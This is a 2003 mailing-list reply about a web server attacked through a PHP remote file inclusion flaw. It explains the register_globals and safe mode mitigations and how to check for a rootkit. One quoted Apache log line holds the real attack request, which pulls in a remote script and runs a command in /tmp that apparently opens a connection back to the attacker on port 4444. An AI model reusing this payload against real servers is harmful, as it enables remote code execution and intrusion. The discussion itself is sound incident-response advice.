Re: Attack using php+apache
On Sat, Nov 15, 2003 at 09:10:00PM -0200, Carlos Eduardo Araujo Vieira wrote:
> Today the server was attacked using php+apache. Some user had a
> 'require $area.php' in his index.php file. The attacker using this he
> could execute some commands like entering the /tmp folder and downloading
> some files.
If you have register globals off *or* safe mode on, this particular
exploit is useless.
If you had register globals on and safe mode off then he could run
arbitrary programs as your Apache user. It's possible he could run a
local root exploiting program, but that's not as likely.
> 200.214.140.237 - - [15/Nov/2003:00:48:00 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 4112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11 [en]"
I think the script is broken because that <db> file is not currently
found.
It's a really stupid script, it could have all been done with one file
if he actually knew how to code PHP.
How to tell if he got to root? The only really sure way is to use a
known-secure boot medium to examine every file on your filesystem that
might be run with root privileges...
Or you can check to see if he made it easy for him to find with the
<chkrootkit> and <debsums> packages. There are probably better options
which people on this list could suggest.
--
Tom Goulet mail: uid0@em.ca
UID0 Unix Consulting web: em.ca/uid0/
Reply to: